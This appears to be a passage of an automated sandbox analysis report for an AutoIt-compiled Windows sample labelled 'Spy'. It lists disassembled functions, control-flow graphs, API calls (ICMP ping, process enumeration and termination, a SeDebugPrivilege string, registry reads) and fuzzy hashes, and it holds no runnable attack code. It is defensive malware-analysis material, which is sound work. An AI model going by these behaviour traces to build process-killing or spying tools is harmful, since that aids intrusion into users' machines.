                                                      • LoadIconW.USER32(000000A2), ref: 00A951A0
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A951C6
                                                      • RegisterClassExW.USER32(?), ref: 00A9521C
                                                        • Part of subcall function 00A83411: GetSysColorBrush.USER32(0000000F), ref: 00A83444
                                                        • Part of subcall function 00A83411: RegisterClassExW.USER32(00000030), ref: 00A8346E
                                                        • Part of subcall function 00A83411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A8347F
                                                        • Part of subcall function 00A83411: InitCommonControlsEx.COMCTL32(?), ref: 00A8349C
                                                        • Part of subcall function 00A83411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A834AC
                                                        • Part of subcall function 00A83411: LoadIconW.USER32(000000A9), ref: 00A834C2
                                                        • Part of subcall function 00A83411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A834D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 47e3b98ff09a5d7ba1d238f6e5069f79e41b1fbf119f33c217a053da001ebe30
                                                      • Instruction ID: 0f12deb6287ba2a4e4b12cb53c2ab1202f5c9bb6b6c23168952341082ef5c65a
                                                      • Opcode Fuzzy Hash: 47e3b98ff09a5d7ba1d238f6e5069f79e41b1fbf119f33c217a053da001ebe30
                                                      • Instruction Fuzzy Hash: 0F212879A94308AFEB119FA4ED09B9D7BB4FB0A710F00415AF504A72A0DFF55A50CF84

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 714 af5e1d-af5e54 call a84dc0 717 af5e56-af5e63 call a8502b 714->717 718 af5e74-af5e86 WSAStartup 714->718 717->718 725 af5e65-af5e70 call a8502b 717->725 719 af5e9d-af5edb call a940cd call a84d37 call a9402a inet_addr gethostbyname 718->719 720 af5e88-af5e98 call ad7135 718->720 735 af5edd-af5eea IcmpCreateFile 719->735 736 af5eec-af5efc call ad7135 719->736 729 af5ff6-af5ffe 720->729 725->718 735->736 737 af5f01-af5f32 call aa0fe6 call a9433f 735->737 741 af5fed-af5ff1 call a91cb6 736->741 746 af5f55-af5f69 IcmpSendEcho 737->746 747 af5f34-af5f53 IcmpSendEcho 737->747 741->729 748 af5f6d-af5f6f 746->748 747->748 749 af5fa2-af5fa4 748->749 750 af5f71-af5f76 748->750 751 af5fa6-af5fb2 call ad7135 749->751 752 af5fba-af5fcc call a84dc0 750->752 753 af5f78-af5f7d 750->753 761 af5fd4-af5fe8 IcmpCloseHandle WSACleanup call a945ae 751->761 762 af5fce-af5fd0 752->762 763 af5fd2 752->763 756 af5f7f-af5f84 753->756 757 af5fb4-af5fb8 753->757 756->749 760 af5f86-af5f8b 756->760 757->751 764 af5f8d-af5f92 760->764 765 af5f9a-af5fa0 760->765 761->741 762->761 763->761 764->757 766 af5f94-af5f98 764->766 765->751 766->751
                                                      APIs
                                                      • WSAStartup.WS2_32(00000101,?), ref: 00AF5E7E
                                                      • inet_addr.WSOCK32(?,?,?), ref: 00AF5EC3
                                                      • gethostbyname.WS2_32(?), ref: 00AF5ECF
                                                      • IcmpCreateFile.IPHLPAPI ref: 00AF5EDD
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AF5F4D
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AF5F63
                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00AF5FD8
                                                      • WSACleanup.WSOCK32 ref: 00AF5FDE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: 4cd4ebb9549287e7d6dfe621b3402919998a1086a82f8021c02b3bdb052bb73f
                                                      • Instruction ID: 49832ca743681e398d5ce459e6e5cd36a4fe5a3e921d90acfd4f116fd2791ff4
                                                      • Opcode Fuzzy Hash: 4cd4ebb9549287e7d6dfe621b3402919998a1086a82f8021c02b3bdb052bb73f
                                                      • Instruction Fuzzy Hash: 9F516C31A04605AFDB20EF74CD49B6AB7E4AF48710F148569FB56DB2A1DB70ED40CB42

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 768 a94d83-a94dd1 770 a94e31-a94e33 768->770 771 a94dd3-a94dd6 768->771 770->771 772 a94e35 770->772 773 a94dd8-a94ddf 771->773 774 a94e37 771->774 775 a94e1a-a94e22 DefWindowProcW 772->775 778 a94ead-a94eb5 PostQuitMessage 773->778 779 a94de5-a94dea 773->779 776 a94e3d-a94e40 774->776 777 ad09c2-ad09f0 call a8c460 call a8c483 774->777 785 a94e28-a94e2e 775->785 780 a94e42-a94e43 776->780 781 a94e65-a94e8c SetTimer RegisterWindowMessageW 776->781 815 ad09f5-ad09fc 777->815 786 a94e61-a94e63 778->786 782 ad0a35-ad0a49 call ae2cce 779->782 783 a94df0-a94df2 779->783 787 a94e49-a94e5c KillTimer call a95ac3 call a834e4 780->787 788 ad0965-ad0968 780->788 781->786 789 a94e8e-a94e99 CreatePopupMenu 781->789 782->786 809 ad0a4f 782->809 790 a94df8-a94dfd 783->790 791 a94eb7-a94ec1 call a95b29 783->791 786->785 787->786 795 ad099e-ad09bd MoveWindow 788->795 796 ad096a-ad096c 788->796 789->786 798 ad0a1a-ad0a21 790->798 799 a94e03-a94e08 790->799 802 a94ec6 791->802 795->786 803 ad098d-ad0999 SetFocus 796->803 804 ad096e-ad0971 796->804 798->775 806 ad0a27-ad0a30 call ad8854 798->806 807 a94e9b-a94eab call a95bd7 799->807 808 a94e0e-a94e14 799->808 802->786 803->786 804->808 811 ad0977-ad0988 call a8c460 804->811 806->775 807->786 808->775 808->815 809->775 811->786 815->775 816 ad0a02-ad0a15 call a95ac3 call a959d3 815->816 816->775
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00A94E22
                                                      • KillTimer.USER32(?,00000001), ref: 00A94E4C
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A94E6F
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A94E7A
                                                      • CreatePopupMenu.USER32 ref: 00A94E8E
                                                      • PostQuitMessage.USER32(00000000), ref: 00A94EAF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: bf9ba046e8bcf904b3525659e6faad6a7a133dbe4754c60959096a139f471b3f
                                                      • Instruction ID: 897d1774475106063faa261d095eebc406ecf9df7ba4eb654ff79dc35553869b
                                                      • Opcode Fuzzy Hash: bf9ba046e8bcf904b3525659e6faad6a7a133dbe4754c60959096a139f471b3f
                                                      • Instruction Fuzzy Hash: 3141047135820AABEF116F249D4DFFE36E5FB4A300F040615F502922A2CFB49D52D761

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00AE4148: CreateToolhelp32Snapshot.KERNEL32 ref: 00AE416D
                                                        • Part of subcall function 00AE4148: Process32FirstW.KERNEL32(00000000,?), ref: 00AE417B
                                                        • Part of subcall function 00AE4148: CloseHandle.KERNEL32(00000000), ref: 00AE4245
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AFF08D
                                                      • GetLastError.KERNEL32 ref: 00AFF0A0
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AFF0CF
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AFF14C
                                                      • GetLastError.KERNEL32(00000000), ref: 00AFF157
                                                      • CloseHandle.KERNEL32(00000000), ref: 00AFF18C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: ef6210b9d73d30d7191642aee77cf983851a6cd938c423e9be794cbe9749e04b
                                                      • Instruction ID: 706132fc3647137f9300a9c1ed4c0571650cd282e724133cdd8e3b6029bc5c73
                                                      • Opcode Fuzzy Hash: ef6210b9d73d30d7191642aee77cf983851a6cd938c423e9be794cbe9749e04b
                                                      • Instruction Fuzzy Hash: 1941DC31200205AFDB25EF64CD96F7DB7A5AF84714F048129FA029F392DFB4A844CB89

                                                      Control-flow Graph

                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AD0C5B
                                                        • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                      • _memset.LIBCMT ref: 00A95787
                                                      • _wcscpy.LIBCMT ref: 00A957DB
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A957EB
                                                      • __swprintf.LIBCMT ref: 00AD0CD1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                      • String ID: Line %d: $AutoIt -
                                                      • API String ID: 230667853-4094128768
                                                      • Opcode ID: 23cce7f9c6edfc3f267f573d8ca5c85353754d8f3871279488ddf1d02fa695a2
                                                      • Instruction ID: 5f4a0f08a4b015a5591e3a2f27d045797544370d18fe9267dff2096195fee711
                                                      • Opcode Fuzzy Hash: 23cce7f9c6edfc3f267f573d8ca5c85353754d8f3871279488ddf1d02fa695a2
                                                      • Instruction Fuzzy Hash: 1041C371548301AACB21EBA0DD86FDF77ECAF45350F000A1EF185931A1EF74A648CB96

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1112 a950db-a9514b CreateWindowExW * 2 ShowWindow * 2
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A95109
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A9512A
                                                      • ShowWindow.USER32(00000000), ref: 00A9513E
                                                      • ShowWindow.USER32(00000000), ref: 00A95147
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: 3814b7077104619d9ea6b1c8d679ee0bff41ae1b4887a554a8605b7877d6af7d
                                                      • Instruction ID: a0637f9bec259105b620521c3a0f13a029b7964e14d6ec9da6c4bd32d3abcf45
                                                      • Opcode Fuzzy Hash: 3814b7077104619d9ea6b1c8d679ee0bff41ae1b4887a554a8605b7877d6af7d
                                                      • Instruction Fuzzy Hash: 37F0DA75595294BEEA312B276C48E672E7DE7C7F50F00411AB900A31B0CEF11991DEB0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1113 ae9b16-ae9b9b call a94a8c call ae9cf1 1118 ae9b9d 1113->1118 1119 ae9ba5-ae9c31 call a94ab2 * 4 call a94a8c call aa593c * 2 call a94ab2 1113->1119 1120 ae9b9f-ae9ba0 1118->1120 1137 ae9c36-ae9c5c call ae96c4 call ae8f0e 1119->1137 1122 ae9ce8-ae9cee 1120->1122 1142 ae9c5e-ae9c6e call aa2f85 * 2 1137->1142 1143 ae9c73-ae9c77 1137->1143 1142->1120 1145 ae9cd8-ae9cde call aa2f85 1143->1145 1146 ae9c79-ae9cd6 call ae90c1 call aa2f85 1143->1146 1155 ae9ce0-ae9ce6 1145->1155 1146->1155 1155->1122
                                                      APIs
                                                        • Part of subcall function 00A94A8C: _fseek.LIBCMT ref: 00A94AA4
                                                        • Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DE1
                                                        • Part of subcall function 00AE9CF1: _wcscmp.LIBCMT ref: 00AE9DF4
                                                      • _free.LIBCMT ref: 00AE9C5F
                                                      • _free.LIBCMT ref: 00AE9C66
                                                      • _free.LIBCMT ref: 00AE9CD1
                                                        • Part of subcall function 00AA2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2F99
                                                        • Part of subcall function 00AA2F85: GetLastError.KERNEL32(00000000,?,00AA9C54,00000000,00AA8D5D,00AA59C3), ref: 00AA2FAB
                                                      • _free.LIBCMT ref: 00AE9CD9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                      • API String ID: 1552873950-2806939583
                                                      • Opcode ID: caf1c36b72c323921c34ab7f50917bc26bc4737177d4473bec785845541200b9
                                                      • Instruction ID: 9361d79e5db46f4447eba50af48875057be6ff3220ae9e5db89c701848403602
                                                      • Opcode Fuzzy Hash: caf1c36b72c323921c34ab7f50917bc26bc4737177d4473bec785845541200b9
                                                      • Instruction Fuzzy Hash: EC514CB1E04259AFDF24DF65DD41AAEBBB9FF48304F10009EB649A3381DB715A908F58

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1157 aa563d-aa5656 1158 aa5658-aa565d 1157->1158 1159 aa5673 1157->1159 1158->1159 1161 aa565f-aa5661 1158->1161 1160 aa5675-aa567b 1159->1160 1162 aa567c-aa5681 1161->1162 1163 aa5663-aa5668 call aa8d58 1161->1163 1165 aa568f-aa5693 1162->1165 1166 aa5683-aa568d 1162->1166 1173 aa566e call aa8fe6 1163->1173 1169 aa56a3-aa56a5 1165->1169 1170 aa5695-aa56a0 call aa3010 1165->1170 1166->1165 1168 aa56b3-aa56c2 1166->1168 1171 aa56c9 1168->1171 1172 aa56c4-aa56c7 1168->1172 1169->1163 1175 aa56a7-aa56b1 1169->1175 1170->1169 1176 aa56ce-aa56d3 1171->1176 1172->1176 1173->1159 1175->1163 1175->1168 1179 aa56d9-aa56e0 1176->1179 1180 aa57bc-aa57bf 1176->1180 1181 aa56e2-aa56ea 1179->1181 1182 aa5721-aa5723 1179->1182 1180->1160 1181->1182 1183 aa56ec 1181->1183 1184 aa578d-aa578e call ab0dd7 1182->1184 1185 aa5725-aa5727 1182->1185 1186 aa57ea 1183->1186 1187 aa56f2-aa56f4 1183->1187 1196 aa5793-aa5797 1184->1196 1189 aa574b-aa5756 1185->1189 1190 aa5729-aa5731 1185->1190 1195 aa57ee-aa57f7 1186->1195 1193 aa56fb-aa5700 1187->1193 1194 aa56f6-aa56f8 1187->1194 1191 aa575a-aa575d 1189->1191 1192 aa5758 1189->1192 1197 aa5733-aa573f 1190->1197 1198 aa5741-aa5745 1190->1198 1201 aa575f-aa576b call aa4906 call ab108b 1191->1201 1202 aa57c4-aa57c8 1191->1202 1192->1191 1193->1202 1203 aa5706-aa571f call ab0ef8 1193->1203 1194->1193 1195->1160 1196->1195 1199 aa5799-aa579e 1196->1199 1200 aa5747-aa5749 1197->1200 1198->1200 1199->1202 1204 aa57a0-aa57b1 1199->1204 1200->1191 1218 aa5770-aa5775 1201->1218 1205 aa57da-aa57e5 call aa8d58 1202->1205 1206 aa57ca-aa57d7 call aa3010 1202->1206 1217 aa5782-aa578b 1203->1217 1209 aa57b4-aa57b6 1204->1209 1205->1173 1206->1205 1209->1179 1209->1180 1217->1209 1219 aa577b-aa577e 1218->1219 1220 aa57fc-aa5800 1218->1220 1219->1186 1221 aa5780 1219->1221 1220->1195 1221->1217
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                      • String ID:
                                                      • API String ID: 1559183368-0
                                                      • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                      • Instruction ID: cb2303f1d3e9c89c51e9e2cccbf7490f827f949af38301549dcfd1a51d3f8236
                                                      • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                      • Instruction Fuzzy Hash: 4E51C930E00B05DBDB288F79D98066E77B5AF42320F688B29F835A72D1D7709D509B48
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A852E6
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A8534A
                                                      • TranslateMessage.USER32(?), ref: 00A85356
                                                      • DispatchMessageW.USER32(?), ref: 00A85360
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Message$Peek$DispatchTranslate
                                                      • String ID:
                                                      • API String ID: 1795658109-0
                                                      • Opcode ID: 1fe3d4a685245b42c205b5248c4bca777dc28103c8e7aaa08d5d9d260b73d281
                                                      • Instruction ID: 77a65f453bcd6b79625028ca92479c1dbfad25418a90dcee57b55d6785c5642b
                                                      • Opcode Fuzzy Hash: 1fe3d4a685245b42c205b5248c4bca777dc28103c8e7aaa08d5d9d260b73d281
                                                      • Instruction Fuzzy Hash: 4F31E130D48B069AEB30AB74DC44BF93BF8EB02344F544169E8229B1A1EFE59985E711
                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A81275,SwapMouseButtons,00000004,?), ref: 00A812A8
                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A81275,SwapMouseButtons,00000004,?), ref: 00A812C9
                                                      • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00A81275,SwapMouseButtons,00000004,?), ref: 00A812EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: 8daa6b34ae66c33e98e0b9a5964c7b58d71aa55c53bef98d6a8d7ceb2496736c
                                                      • Instruction ID: 7a66616f99ecb2809d0506002f8ea8a7fea35bb736924be6c380cf63b2d49699
                                                      • Opcode Fuzzy Hash: 8daa6b34ae66c33e98e0b9a5964c7b58d71aa55c53bef98d6a8d7ceb2496736c
                                                      • Instruction Fuzzy Hash: FA111875910208BFDB20AFA5DC84EEEBBBCEF05741F508569F805D7110E6719E819BA0
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,00B12C4C), ref: 00AE3F57
                                                      • GetLastError.KERNEL32 ref: 00AE3F66
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00AE3F75
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B12C4C), ref: 00AE3FD2
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 2267087916-0
                                                      • Opcode ID: 2e214d34bcc1c754239853c26e645556807956f41d644e5851962716df96d953
                                                      • Instruction ID: 3369b830081ebd6ec509315bb7ad7fffc65444f352fc973b9ed57e0e2883b1fe
                                                      • Opcode Fuzzy Hash: 2e214d34bcc1c754239853c26e645556807956f41d644e5851962716df96d953
                                                      • Instruction Fuzzy Hash: 2C21B7719082419F8B10DF29C8859AEB7F4FE55364F50461DF495CB2A1DB30DA45CB42
                                                      APIs
                                                      • _memset.LIBCMT ref: 00A95B58
                                                        • Part of subcall function 00A956F8: _memset.LIBCMT ref: 00A95787
                                                        • Part of subcall function 00A956F8: _wcscpy.LIBCMT ref: 00A957DB
                                                        • Part of subcall function 00A956F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A957EB
                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00A95BAD
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A95BBC
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AD0D7C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
